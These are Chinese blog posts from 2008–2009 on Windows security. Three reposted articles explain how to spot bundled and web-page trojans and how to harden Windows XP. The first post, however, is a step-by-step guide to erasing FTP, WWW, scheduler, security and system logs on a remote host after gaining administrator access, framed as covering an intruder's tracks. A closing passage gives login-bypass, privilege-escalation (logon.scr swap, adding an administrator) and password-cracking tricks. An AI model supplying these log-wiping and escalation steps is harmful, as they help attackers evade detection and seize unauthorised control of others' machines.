L. xin

完美清理日志的总结

214567620@qq.com(L. xin) — Sat, 31 Oct 2009 00:35:49 GMT

　　一:开始 - 程序 - 管理工具 - 计算机管理 - 系统工具 -事件查看器，然后清除日志。
　　二: Windows2000的日志文件通常有应用程序日志，安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等。
　　日志文件默认位置：
　　应用程序日志、安全日志、系统日志、DNS日志默认位置：%sys temroot%system32config，默认文件大小512KB，管理员都会改变这个默认大小。
　　安全日志文件：%systemroot%system32configSecEvent.EVT;
　　系统日志文件：%systemroot%system32configSysEvent.EVT;
　　应用程序日志文件：%systemroot%system32configAppEvent.EVT;
　　Internet信息服务FTP日志默认位置：%systemroot%system32logfilesmsftpsvc1，默认每天一个日志;
　　Internet信息服务WWW日志默认位置：%systemroot%system32logfilesw3svc1，默认每天一个日志;
　　Scheduler服务日志默认位置：%sys temroot%schedlgu.txt;
　　以上日志在注册表里的键：
　　应用程序日志，安全日志，系统日志，DNS服务器日志，它们这些LOG文件在注册表中的：
　　HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog
　　有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表，里面可查到以上日志的定位目录。
　　Schedluler服务日志在注册表中
　　HKEY_LOCAL_MACHINESOFTWAREMicrosoftSchedulingAgent
　　FTP和WWW日志详解：
　　FTP日志和WWW日志默认情况，每天生成一个日志文件，包含了该日的一切记录，文件名通常为ex(年份)(月份)(日期)，例如ex001023，就是2000年10月23日产生的日志，用记事本就可直接打开，如下例：
　　#Software: Microsoft Internet Information Services 5.0(微软IIS5.0)
　　#Version: 1.0 (版本1.0)
　　#Date: 20001023 0315 (服务启动时间日期)
　　#Fields: time cip csmethod csuristem scstatus
　　0315 127.0.0.1 [1]USER administator 331　(IP地址为127.0.0.1用户名为administator试图登录)
　　0318 127.0.0.1 [1]PASS – 530　(登录失败)
　　032:04 127.0.0.1 [1]USER nt 331　(IP地址为127.0.0.1用户名为nt的用户试图登录)
　　032:06 127.0.0.1 [1]PASS – 530　(登录失败)
　　032:09 127.0.0.1 [1]USER cyz 331　(IP地址为127.0.0.1用户名为cyz的用户试图登录)
　　0322 127.0.0.1 [1]PASS – 530　(登录失败)
　　0322 127.0.0.1 [1]USER administrator 331　(IP地址为127.0.0.1用户名为administrator试图登录)
　　0324 127.0.0.1 [1]PASS – 230　(登录成功)
　　0321 127.0.0.1 [1]MKD nt 550　(新建目录失败)
　　0325 127.0.0.1 [1]QUIT – 550　(退出FTP程序)
　　从日志里就能看出IP地址为127.0.0.1的用户一直试图登录系统，换了四次用户名和密码才成功，管理员立即就可以得知管理员的入侵时间、IP地址以及探测的用户名，如上例入侵者最终是用administrator用户名进入的，那么就要考虑更换此用户名的密码，或者重命名administrator用户。
　　WWW日志：
　　WWW服务同FTP服务一样，产生的日志也是在%sys temroot%sys tem32LogFilesW3SVC1目录下，默认是每天一个日志文件，下面是一个典型的WWW日志文件
　　#Software: Microsoft Internet Information Services 5.0
　　#Version: 1.0
　　#Date: 20001023 03:091
　　#Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent)
　　20001023 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
　　20001023 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
　　通过分析第六行，可以看出2000年10月23日，IP地址为192.168.1.26的用户通过访问IP地址为192.168.1.37机器的80端口，查看了一个页面iisstart.asp,这位用户的浏览器为compatible;+MSIE+5.0;+Windows+98+DigExt，有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定入侵者的IP地址以及入侵时间。
　　既使你删掉FTP和WWW日志，但是还是会在系统日志和安全日志里记录下来，但是较好的是只显示了你的机器名，并没有你的IP。
　　属性里记录了出现警告的原因，是因为有人试图用administator用户名登录，出现一个错误，来源是FTP服务。
　　这里有两种图标：钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标，表示四次失败审核，事件类型是帐户登录和登录、注销失败，日期为2000年10月18日，时间为1002，这就需要重点观察。
　　双点第一个失败审核事件的，即得到此事件的详细描述。
　　经过分析我们可以得知有个CYZ的工作站，用administator用户名登录本机，但是因为用户名未知或密码错误(实际为密码错误)未能成功。另外还有DNS服务器日志，不太重要，就此略过(其实是我没有看过它)。
　　知道了Windows2000日志的详细情况，下面就要学会怎样删除这些日志：
　　通过上面，得知日志文件通常有某项服务在后台保护，除了系统日志、安全日志、应用程序日志等等，它们的服务是Windos2000的关键进程，而且与注册表文件在一块，当Windows2000启动后，启动服务来保护这些文件，所以很难删除，而FTP日志和WWW日志以及Scedlgu日志都是可以轻易地删除的。首先要取得Admnistrator密码或Administrators组成员之一，然后Telnet到远程主机，先来试着删除FTP日志：
　　D:SERVER>del schedlgu.txt
　　D:SERVERSchedLgU.Txt
　　进程无法访问文件，因为另一个程序正在使用此文件。说过了，后台有服务保护，先把服务停掉!
　　D:SERVER>net stop "task scheduler"
　　下面的服务依赖于 Task Scheduler 服务。停止 Task Scheduler 服务也会停止这些服务。
　　Remote Storage Engine
　　是否继续此操作? (Y/N) [N]: y
　　Remote Storage Engine 服务正在停止....
　　Remote Storage Engine 服务已成功停止。
　　Task Scheduler 服务正在停止.
　　Task Scheduler 服务已成功停止。
　　OK，它的服务停掉了，同时也停掉了与它有依赖关系的服务。再来试着删一下!
　　D:SERVER>del schedlgu.txt
　　D:SERVER>
　　没有反应?成功了!下一个是FTP日志和WWW日志，原理都是一样，先停掉相关服务，然后再删日志!
　　D:SERVERsystem32LogFilesMSFTPSVC1>del ex*.log
　　D:SERVERsystem32LogFilesMSFTPSVC1>
　　以上操作成功删除FTP日志!再来WWW日志!
　　D:SERVERsystem32LogFilesW3SVC1>del ex*.log
　　D:SERVERsystem32LogFilesW3SVC1>
　　OK!恭喜，现在简单的日志都已成功删除。下面就是很难的安全日志和系统日志了，守护这些日志的服务是Event Log，试着停掉它!
　　D:SERVERsystem32LogFilesW3SVC1>net stop eventlog
　　这项服务无法接受请求的 "暂停" 或 "停止" 操作。没办法，它是关键服务。如果不用第三方工具，在命令行上根本没有删除安全日志和系统日志的可能!所以还是得用虽然简单但是速度慢得死机的办法：打开“控制面板”的“管理工具”中的“事件查看器”(98没有，知道用Win2k的好处了吧)，在菜单的“操作”项有一个名为“连接到另一台计算机”的菜单，点击它，输入远程计算机的IP，然后等上数十分钟，接着选择远程计算机的安全性日志，右键选择它的属性：点击属性里的“清除日志”按钮，OK!安全日志清除完毕!同样的忍受痛苦去清除系统日志! 目前在不借助第三工具的情况下，能很快，很顺利地清除FTP、 WWW还有Schedlgu日志，就是系统日志和安全日志属于Windows2000的严密守护，只能用本地的事件查看器来打开它，因为在图形界面下，加之网速又慢，如果你银子多，时间闲，还是可以清除它的。综上所述，介绍了Windows2000的日志文件以及删除方法，但是你必须是 Administrator，注意必须作为管理员或管理组的成员登录才能打开安全日志记录。该过程适用于 Windows 2000 Professional 计算机，也适用于作为独立服务器或成员服务器运行的 Windows 2000 Server 计算机。

入侵防御（三）

214567620@qq.com(L. xin) — Thu, 22 Oct 2009 05:09:23 GMT

转载：出自暗组信息安全论坛 http://forum.darkst.com/

从本文你可以学到：
如何管理计算机用户
如何为自己系统打补丁
三、防漏洞扫描入侵
说起漏洞我们就不得不说说它的发现者——Hacker（黑客），黑客这个名词的意思是：一个计算机通，能够随心所欲的驾驶计算机的人都可称为Hacker（闯入他人计算机系统并进行破坏的人称为Cracker ）。在世界上的其它地方，人们总是把那些闯入他人计算机系统的人称为Hacker。漏洞的产生通常是由于软件的缺陷造成即：Bug，是因为编写程序的程序员的水平有限或者粗心造成的！而编写的程序越大出现漏洞的几率就越大。就比如：现在炒的最火的Vista系统吧！还没发布正式版就传出有漏洞被发现……。然后比尔就命令手下：“给我补好咯！”。好现在进入正题给我们系统做个体检 GO！
我们使用的系统多数是Windows XP SP2 （如图1）吧，好我们就围绕XP来说说怎么防御漏洞扫描入侵！

（图 1 识别XP系统的标志性属性）
我们分为三步进入课程：第一步安全分配用户；第二步关闭系统默认共享；第三步为自己系统打补丁。
1. 安全分配用户
一般电脑从电脑城买回来如果是已经安装系统的我们必须检查Administrator用户是否设置了密码当然最好是重新设置一下“强壮”的密码，是否强壮必须具备一下条件：字母（大小写）+ 数字 + 特殊符号（如：·#￥标点符号等）=强壮的密码（长度在8位以上）修改密码的方法如下：
右击我的电脑→在弹出的快捷菜单中选择管理（如图2）→在本地计算机管理中选择系统工具→展开本地用户和组→在单击用户即可以打开（如图3）所示，在Administrator用户名右击一下选设置密码在提示（如图4）中点继续输入你想要的新密码确定即可。还有一些帐号我们在实际使用中是用不到的我们可以删除防止被人破解出密码威胁到你的计算机安全。对于Guest用户删除可以通过注册表来删除该用户方法如下：
单击开始菜单选择运行命令→输入regedit 回车确定依次展开如下地址：HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest 如无法展开HKEY_LOCAL_MACHINE\SAM\SAM请为它设置权限即可→在这点选SAM项目右击→权限把你使用的帐号添加进去即可并添加完全控制权限确定即可！（如图5）然后完整打开HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\找到Guest项（如图 6）然后右击单击选择删除，在提示是否删除选确定。重新启动电脑即发现原来在用户管理里删除不了的Guest帐号奇迹般的消失了呵呵！至于权限问题我就不想多说了大家自己琢磨吧，给一般用户设置一个User权限的帐号就可以了！

图2 单击菜单中的管理项

图 3 显示计算机中所有的用户

图 4 提示是否需要修改Administrator密码

图 5 设置访问注册表的权限

图6 打开Guest 帐号项目所在的主键
2. 关闭系统默认共享
默认共享即开机自动把用户电脑上的所有本地磁盘进行共享，（如：C$ 、D$、IPC$等看用户机器的分区数量而定）原来是方便管理员文件传送方便的。而现在则变为入侵利用的一个途径……！我们就要关闭这危险的默认共享。使用批处理给它快速关闭
net share ipc$/del
net share admin$ /del
net share c$ /del
net share d$/del
net share e
$/del
把以上的内容保存到一个文本中（如图 7）（这里只是删除Ipc、Admin、c、d、e的共享，如果还有别的盘请自己添加），在修改后缀.bat 运行一下即可删除全部共享
不过重新开机会自动在开启。所以想完全禁止只有修改注册表或者禁用服务……，
修改注册表方法：（还不清楚向上看吧）
运行-regedit
server版找到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。
如果上面所说的主键不存在，就新建(右击-新建-双字节值)一个主健再改键值。
禁用服务server：
右击我的电脑→在弹出的快捷菜单中选择管理→服务和应用程序→服务（如图 8）-找到服务server（右击）-属性-常规-启动类型-已禁用即可！不过这种方法对以后使用网络的一些程序会出现问题不推荐。

图 7 写入命令的文本

图8 打开显示服务的面板
3. 为自己系统打补丁
对于漏洞最好的方法就是更新程序，但是系统这么大我们怎么更新？不用怕微软已经考虑到这一点专门为我们XP2用户提供了一个更新系统补丁的程序《自动更新》我们只要正确使用该功能就可以最大避免漏洞给我们带来的损失！使用方法：
右击我的电脑→在弹出的快捷菜单中选择属性→自动更新选项卡→选自动并设置一个适当的时间进行更新吧（如图 9）这个在一些GHOST制作的系统中默认选择关闭的所以要手动打开（这里说一下市面上所谓的GHOST系统，都可能加入了作者后门哦！够黑吧……如果条件允许还是用安装版本的系统把最好是纯净的XP原版）除了微软提供自动更新程序外我们也可以主动扫描系统的漏洞，现在很多大杀毒软件公司已经为我们提供了这类扫描工具。例如：瑞星的卡卡助手、奇虎的360卫士等。

图9 设置自动更新

只要上边三步你都认真的做了！恭喜你你的电脑处于安全状态了。
总结：攻与防始终是矛盾的一方，始终没有停止，所有我们要做好迎接战斗的准备！到此反黑精英之入侵防御系列文章已经全部撰写完毕了。欢迎大家到暗组技术论坛交流学习 http://www.darkst.com

入侵防御（二）

214567620@qq.com(L. xin) — Thu, 22 Oct 2009 04:48:40 GMT

转载：出自暗组信息安全论坛 http://forum.darkst.com/

从本文你可以学到：
1. 如何识别网页是否存在木马
2. 如何正确处理系统中IE漏洞
二、防网页木马入侵
大家看到这章标题的时候可能都这么想：“什么啊？网页木马入侵！那我们上网浏览网站（冲浪）的安全谁来保护我们啊，”对于这些顾虑你可以不用去想，因为你看完这部分文献你基本上就可以大胆的遨游Internet(因特网)。
下面我们用四个方法：第一种识别利用隐藏框架调用htm 、第二种识别利用重定向任何调用的htm、js、第三种防御网页木马我只用IE、第四种IE漏洞修补及意见；带你进入安全互联网时代Let GO!
⒈识别利用隐藏框架调用htm
利用隐藏框架链接到网页木马就是其实就是利用HTML网页语言，制作一个肉眼无法看到的一个框然后后台隐藏打开网页木马地址，从而执行了恶意代码（漏洞利用的代码）。我们简单分析一下这段常用的网页挂马代码把，懂HTML语言都应该清楚的：其实就是一个宽和高都为0的框大家当然看不到了，从而达到后台隐藏打开含有恶意代码的网页（即网页木马）→种植后门→远程控制进行信息窃取或者进行磁盘文件破坏等一系列动作……。对于防范我们可以利用一款软件《网页木马防护器》。比如：我们想访问的网站为“http://www.darkteam.cn” 在软件查看页面选项中输入地址即可查看到该网站的首页（即：主页）（如图1）可以看出我们现在访问的网站页面应该是正常的！现在我们看看不是正常的页面提示什么吧！（如图2）检查提示中显示：“网页有不可见窗体，有木马，小心！” 看到这个不用我说你们要做什么了吧。赶紧杀毒吧！（这款软件判断标准就是符合就回提示有不可见窗体，软件缺陷就是也可以算是BUG 改一下宽和高就检查不到了(如图3）弱智吧！关键时刻还是要靠自己……至于软件问题我就不想多说因为也不是我编写的，有能力的可以报告给作者叫他更新或者自己编写一个程序，这里我们继续用这款软件人工判断。）
我们自行判断代码所要看的关键字是“ winth= 0到 10 之间 height= 0 到 10 之间，还要判断一定要在之间才有效”代码可以在软件的<网页源代码> 中看到一般在网页的底端之前对于代码太多不好看的时候可以使用复制全部代码到任何一款文本编辑器中如：“记事本”然后用查找功能搜索关键字“
图1 正在检查站点的默认主页

图2 含有恶意代码的页面

图3 变异的恶意代码页面轻松躲避检查

⒉识别利用重定向任何调用的htm、js
这类调用很难检查，不过使用率到现在还不是很高。《网页木马防护器》检查主页然后查看是否有这个代码？“”（如图4）这类检查难就难在这个调用JS的代码是正常的，不正常的恶意代码是在JS里而不是主页中。我们只有把这个JS下载下来检查（可以使用下载工具如迅雷，批量下载回来检查）……。JS文件中恶意代码代码特征和HTM主页特征基本一样，代码如下：“document.write("");” winth= 0到 10 之间 height= 0 到 10 之间，还要判断一定要在之间才有效。

图4 正常调用JS行为

对于连接到网页木马可以查看是否存在这些典型的代码：
MS06014 网页木马的恶意代码：（网页木马代码远远不止这些其实还有很多不过都不能对IE6.0或者打过补丁的系统起作用！）

Oh,my god! 提示给浏览者的信息，顶部标题栏显示。

You DO it! 显示的文字信息

从上面代码我们可以看出网页基本是HTML静态页面，不过也不排除ASP版的网页木马。之前我们介绍的两种方法是防御联接网页木马的方法，也就是通常所说的“挂马”是很多小黑客经常使用的方法，但是如果是本身就是漏洞利用的恶意代码呢？我们不是……没法了？好我们现在我们进入防网页木马的方法吧！
⒊防御网页木马我只用IE
这里以常用浏览器IE6.0版本来介绍方法：
禁用脚本：打开IE的internet选项-->安全->自定义级别，往下翻找到脚本--java小程序，禁用即可。(如图5)

图5修改IE禁用javascript脚本
当然也可以禁用VBScript就在脚本项目里面有几个全部选择禁用即可。最后单击一下[重置]即可生效最后单击确定退出。当然也可以直接把安全级别设成高就好了（如图5）。注：禁用了脚本会有很多想不到麻烦，因为绝大数网站都会用到的。如美化或者动画效果需要调用脚本才能实现
。
禁用(iframe)隐藏框架调用文件：方法基本和上面禁用脚本是一样的！（如图6）当然也可以直接把安全级别设成高就好了（如图5画圈圈处）

图6 选项选禁用即可
⒋IE漏洞修补及意见
禁用脚本会导致浏览不正常或者页面出现很多不正常的问题不推荐使用！微软对于网页木马利用的IE漏洞都会发布相应的补丁我们只有即使补全以减小中招的可能！当然也可以使用非IE内核的浏览器如：Mozilla Firefox火狐浏览器（如图7）、Opera浏览器（如图8）等，不管用什么浏览器即时更新软件并做好软件缺陷的补丁安装是很有必要的！

图 7 火狐浏览器截图

图8Opera浏览器截图
本期小结：虽然网页木马很多但是我们只要掌握一些方法，我们还是可以将中招几率大大降低的！

入侵防御（一）

214567620@qq.com(L. xin) — Thu, 22 Oct 2009 04:37:38 GMT

转载：出自暗组信息安全论坛 http://forum.darkst.com/

从本文你可以学到：
1. 如何识别文件是否捆绑木马
2. 如何处理解决捆绑木马文件
在PC个人电脑的不断普及和ADSL宽带逐渐成为主流的上网方式，你可以使用的从原来的电话拨号56K网速到现在的ADSL 1MB、小区LAN 10MB或者更高。网速快了这个事实让人欣喜，但是你有没有想过在互联网的普及使得你的电脑随时都有可能受到来自网上的各种攻击。本文将把你们带入一个安全网络时代，让你被攻击的可能性降到最低。
入侵防御总的说来应该分为3大类：
防捆绑木马入侵
防网页木马入侵
防漏洞扫描入侵

一、防捆绑木马入侵
现在的牧“马”者是越来越狡猾，他们常用文件捆绑的方法，将木马捆绑到图像、纯文本等常见的文件中，然后通过QQ、Email或MSN等将这些文件传送给受害者，而一旦不慎打开这些文件，你就“中招”了（当然是木马了）。那对付这些捆绑木马有哪些值得我们平时注意的？
先说说捆绑木马是什么，捆绑就是存在两个或两个以上的几个文件组合成的一个整体：但是只有一个文件真正被我们使用其他的则是后台悄悄运行植入我们的电脑。

捆绑木马的手段归纳起来共有四种：第一种是利用捆绑机软件和文件合并软件捆绑木马；第二种是利用WINRAR、WINZIP等软件制作自解压捆绑木马；第三种是利用软件打包软件制作捆绑木马；第四种是利用多媒体影音文件传播。不过，今天我们这里并不是介绍如何捆绑木马，而是针对这四种的捆绑木马方法给读者讲解如何识破的方法。首先我们来看如何识破第一种方法的诡计。
⒈利用捆绑机软件和文件合并软件捆绑木马（出现几率50%）
在进行这一步之前我们需要了解一下PE文件的一些基础知识：

PE文件也就是可执行应用程序文件即应用程序 32位系统Window图形界面系统常见后缀名：[.exe] 16位系统即DOS文件系统常见后缀名：[.com] 对于PE文件的知识我们就只要知道这些：在WINDOW32位下运行先从 DOS MZ header→PE header → Section → Overlay尾部数据基本就是这个流程，下面我们开始详细介绍捆绑木马及识破方法。
捆绑模式有两种：一种是在原有的程序文件尾部添加数据，从而达到你运行正常的程序同时运行木马的效果；而另外一种就是利用捆绑器中自带的一个PE头文件来捆绑文件，在你运行这种类型的文件时他会先释放两个文件（一个是正常的被捆绑的文件，而另外一个则是木马或者其他附加给你的程序如：IE插件）后者在运行速度上可能稍慢于前者，利用第二种模式的捆绑木马最为多见
为了防范这类木马所以我们制定两种方案：
首先我们用PEID查是否存在尾部数据防范前者利用附加数据来捆绑木马，在则是用C32ASM查文件头个数以防范后者利用PE头捆绑木马（下面我们进入实例来说说）
先用PEID 看看有没有尾部数据显示 “Microsoft Visual C++ 6.0 [Overlay ]” Overlay就是尾部数据见（如图1）一般捆绑文件就是在尾部数据Overlay这里面，而不会放在头或者区段里！（但仅仅通过从这个判断是否有捆绑是不行的，需要做下步进行判断！）

（图1 PEID 查尾部数据）
在把文件拖到C32ASM窗口中选16进制打开文件（如图2）然后利用ANSI码搜索关键字“MZ”（如图3）出现多个DOS MZ header且文件部分和（如图4）相似即可判断为该文件有多个PE头也就是存在多个程序（木马或者其他程序）在内部（从这个判断一般都是没错的了，除了少数程序例外。）

（图 2 C32ASM拖放打开文件提示界面）

（图 4 常见的PE头部一般一个程序只有一个）

⒉利用WINRAR、WINZIP等压缩软件制作自解压捆绑木马（出现几率30%）

（图5 RAR SFX自解压模块）
因为WINRAR是我们现在最常用的压缩软件所以我们必须小心点，不然就被图谋不愧的人利用了……。别和我说你没有安装WINRAR哦，如果是这样下面的步骤可能不一样哦。还是看情况把对于EXE可执行文件我们都可以使用如下方法进行检查：不要先运行而是先用PEID 查看看是（RAR SFX）自解压模块（如图5），发现这点好办用RAR打开这个EXE就可以了（如图 6）右键快速打开文件，打开后查看右边的注释（如图 7）显示如下：
;下面的注释包含自解压脚本命令
Setup=2.exe
Presetup=1.exe
Silent=1
Overwrite=1
一般Presetup=*.exe 这个为木马文件而Setup=*.exe这个为正常文件但也有可能两个都是木马……，这些是不定的最保险还是解压出来用杀毒软件查杀一下，如果两个或者多个都没有被查杀那很可能这个木马已经被免杀处理过了这个时候最好是去其他地方重新下载一个吧，这样比较好。当然你也可以通过图标来判断（前提你知道你下载的这个文件原始图标应该是哪样的）。最后把那个你认为是木马的文件仍掉即可！

（图 6 WINRAR右键快速打开文件）

（图 7 查看RAR注释的界面）
⒊利用软件打包软件制作捆绑木马（出现几率10%）

（图8用Nullsoft Pimp 打包的安装程序）
这里说的软件打包后的程序也就是我们通常使用的安装程序即：（SETUP.exe）先用PEID查壳（如图 8）这类捆绑是很难在不运行安装程序的情况下分离的，要分离的话可能只有反编译安装包了（不过这样做是很危险的，而且很难避免安装程序的不运行）。下面我们就教大家一种最简单的方法识别这类可能存在问题的安装程序，就是利用MD5值来判断文件是否为正常的安装程序，当然要使用MD5来判断必须要有另外一个相同的安装包即软件版本相同或者和安装程序大小相同的你才可以继续以下步骤。当你已经下载了一个安装程序你可以尝试换个非该站下载点的另外一个地址的安装包，如果可能当然最好是去到官方下载，下载后用WINMD5工具对比一下MD5值使用技巧：选中两个需要对比MD5的文件用鼠标拖动到程序窗口处就可以进行对比了（如图 9）对比后通过看MD5值就可以发现两个安装包不一样了（因为世界上几乎没有一个不相同的文件拥有相同的MD5值就和人的指纹一样具有特殊性是不能被模仿的，除非复制一分但是不能改动文件本身的，只要改变了文件任何地方他的MD5值也就随之改变），既然知道它有这个特性你就可以做出判断了，大多数我们都是以官方站下载、大软件站下载的为主把另外那个删除就可以了。

（图 9用WINMD5查看两个相同软件的安装包）
⒋利用多媒体影音文件传播（出现几率是10%）
很多读者听到这个的时候应该都很惊讶吧，就连听音乐和看电影都有可能中木马啊不过这类木马大部分还是基于IE漏洞或者系统漏洞传播或者软件自身缺陷，内置浏览网页的软件或插件出现漏洞问题导致的（也就是必须通过网页木马才可以生效，缺这个环节它也是虚惊一场）。这类木马一般出现在格式为： .wma .mp3 .rm .swf这三种如果还有别的我就不清楚了。但都是先制作RM影音木马（方法就是利用Helix Producer Plus或者图形版的RealMedia Editor来合并事件达到设定时间打开指定的含有恶意代码的网页），然后利用其他格式转换软件将RM格式转换成其他格式的多媒体文件（如：.wma .mp3 等）但是仍然保留打开网页连接的特性。对于Flash的影片.swf也可以弄跳转的这种很难防御的……。
对于要彻底防御这类影音木马我们只有禁止当前所有程序创建新的网络连接，只有这样才能才能在听音乐或者看电影的时候不出在弹出窗口中访问连接含有恶意代码网页，从而完全杜绝这类木马的危害。因为几乎大部分低版本的多媒体播放器都存在这漏洞。所以我们要打好该播放器的安全更新补丁或者及时升级最新版本的播放器。如果还不能解决这个问题的话可以试试看我提供给大家的这两种方法：
第一种：暂时断开网络连接播放整个文件是否存在问题（适用于短小的音乐文件，对于比较长时间的影音推荐还是关闭网络连接看吧。）
第二种：使用手动查杀必备的大哥大工具冰刃（IceSword）（如图10）禁止创建新进程，主要是防御浏览多媒体文件时突然弹出的浏览器窗口（如微软的IE 、腾讯的TT ）。使用步骤如下：打开冰刃进入主界面→单击“文件”菜单→选择“设置”→钩选“禁止进线程创建”（如图 11）最后在单击确定即可。如要恢复逆操作一遍即可。经过第二种方法后你大可以放心的享受多媒体了，因为大部分通过浏览器起作用的恶意代码都调用不起来的。

（图 10（IceSword）的主界面）

（图11禁止进线程创建）
① 防捆绑木马入侵小结：工具不是万能的而人是活的，大家可以利用以上的方法加以结合即可达到事半功倍的效果。

破解常用电脑密码实用技巧

214567620@qq.com(L. xin) — Thu, 14 Aug 2008 00:46:31 GMT

一、CMOS密码破解
　　使用电脑，首先需要开机。因此开机密码是我们最先要遇到的。虽然CMOS种类各异，但它们的加密方法却基本一致。一般破解的方法主要从“硬”和“软”两个方面来进行。
　　1.“硬”解除方法
　　硬件方法解除CMOS密码原理是将主板上的CMOSRAM进行放电处理，使存储在CMOSRAM中的参数得不到正常的供电导致内容丢失，从而起到解除CMOS密码的目的。一些报刊对如何破解CMOS密码的通常做法，如跳线短接法和电池短接法已有较多介绍，操作起来也十分方便。但我们这里要介绍的是个另类技巧，这也是一些电脑DIY们很喜欢用的方法。方法也很简单：打开机箱，将硬盘或光驱、软驱的数据线从主板上拔掉，然后再启动计算机，BIOS会在自检时报告错误并自动进入CMOS，此时就可以重新设置BIOS内容了。
　　2.“软”解除方法
　　严格地说，“软”解除CMOS密码没有“硬”解除方法那么彻底，但也十分奏效。CMOS密码根据需要，可设为普通级用户密码和超级用户级密码两种。前者只是限制对BIOS的修改，可以正常启动电脑和运行各类软件，而后者则对进入电脑和BIOS完全禁止。
　　1）破解普通用户密码
　　首先用DOS启动盘启动电脑，进入DOS状态，在DOS命令行输入debug回车，然后用所列的其中任何一种方法的数据解除CMOS密码，重新启动电脑，系统会告诉你CMOS参数丢失，要求你重新设定CMOS参数。经过试验，这是一种很有效的方法。“-”后面的字母“O”，表示数值输出的地址，70和10都是数值。
　　2）破解超级用户密码
　　这里我们需借助外部工具。我们选用最为经典的BiosPwds，是一款免费软件，比较适合对DOS不太熟悉的电脑用户，很久以前就为人们所熟知，只要轻轻一点，就会将用户的CMOS密码显示出来。工具最新版本1.21，127KB，免费下载地址：http：//bj2.onlinedown.net/soft/8107.htm。下载解压后，双击该软件的执行文件，在出现的界面中点击“Getpasswords”按钮，稍等二、三秒即会将BIOS各项信息显示于BiosPwds的界面上，包括：Bios版本、Bios日期、使用密码等，这时你便可以很轻松地得知BIOS密码。
　　二、破解系统密码
　　系统密码是你登录到操作系统时所使用到的密码，它为你的计算机提供了一种安全保护，可以使你的计算机免受非法用户的使用，从而保障电脑和机密数据的安全。
　　1. Windows98/ME的系统登录密码
　　① 取消法
　　最简单的一种方法是在系统登录要求输入密码时，你什么也不用输入，直接点击取消，可以进入操作系统。但用此种方法只能访问本机的资源，如果计算机是局域网的一部分，你将不能访问网络资源。
　　② 新增使用者
　　当你由于密码问题被挡在系统之外时，不妨为系统再新增一个使用者，然后重新登录，一样可以登录系统并访问系统或网络资源。单击“开始”/“设置”/“控制面板”，然后双击“用户”，打开“用户属性”对话框。接着，根据提示依次输入“用户名”、“密码”、“个性化项目设置”中所需的内容，最后单击“完成”。
　　③ 删除"PWL"文件
　　删除Windows安装目录下的.PWL密码文件和Profiles子目录下的所有个人信息文件，然后重新启动Windows，系统就会弹出一个不包含任何用户名的密码设置框，我们无需输入任何内容，直接点击"确定"按钮，Windows密码即被删除。
　　④ 修改注册表
　　运行注册表编辑器，打开注册表数据库"HKEY＿LOCAL＿MACHINE＼Network＼Logon"分支下的"username"修改为"0"，然后重新启动系统，也可达到去掉密码的目的。
　　2. 破解WindowsNT密码
　　如果你有普通用户账号，有一个很简单的方法获取NTAdministrator账号：先把c：＼winntsystem32下的logon.scr改名为logon.old备份，然后把usrmgr.exe改名为logon.scr再重新启动。logon.scr是系统启动时加载的程序，重新启动后，不会出现以往的登录密码输入界面，而是用户管理器，这时你就有权限把自己加到Administrator组。
　　3. Windows2000密码
　　启动盘启动电脑或引导进入另一操作系统（如Windows98），找到文件夹"X：＼DocumentsandSettings＼Administrator"（X为Windows2000所在磁盘的盘符），将此文件夹下的"Cookies"文件夹删除，然后重新启动电脑，即可以空密码快速登录Windows2000。
　　4. 破解WindowsXP的密码
　　在启动WindowsXP时按F8键选择带命令行的安全模式，使用net命令可以对用户身份进行操作。具体步骤如下：使用命令"netuserabcd/add"添加一名为abcd的用户，使用命令"netlocalgroupadministratorsabcd/add"将用户abcd提升为管理员，重新启动电脑，用abcd身份登录，最后对遗忘密码的用户进行密码修改即可。
　　网管员在维护和使用电脑时，经常会遇到各种密码丢失的问题，这里，我们就为广大网管员准备了一些破解密码的方法，但是希望大家不要干坏事哦。
　　三、破解几个常用软件密码
　　目前，更多的用户懂得了利用电脑软件对自己的一些储存在电脑中的信息进行加密操作，使无权阅读的人无法轻松打开这些重要资料。下面就让我们一块看一下几个常用软件密码的解除：
　　1. 破解WPS系列密码
　　如果你是合法用户，在忘却密码时，启动WPS程序，点击“文件”/“密码设置”菜单，在出现的密码设置对话框中可以看到原密码会自动以“”号的方式出现在“密码”文本框中，点击“清除”按钮，再在随后出现的提示框中点击“确认”按钮，该加密文件的密码已经被清除了。以后再次打开该文件就不再需要输入密码了。如果你不是合法用户就只能借助有关工具进行破解。现在破解WPS密码的软件很多，但论其功能强大，破解速度快就要数国产的Edward＇sWPS2000PasswordRecovery了。该工具破解WPS密码采用的是破解密码的常见的方法———穷举法。使用步骤如下：首先，在程序界面中的“EncryptedWPS2000file”的文本框中通过右侧的“浏览”按钮加入需破解的WPS加密文件；然后选择密码破解方法，该软件有以下几种密码破解方式：Brute-force（强力攻击）、Dictionary（字典攻击）、mask（掩码搜索）等等，一般选用“Brute-force”（强力破解）法；接着在“Brute—forceRangeOptions”列表框中选择破解密码可能包含的密码范围，例如：大小写字母、数字、是否有空格、特殊字符等；此外还要指定密码长度，如6位或更长；最后，当上述几项设置完毕后，请点击"RUN"选项，密码很快得以破解。
　　2. 破解Word文档密码
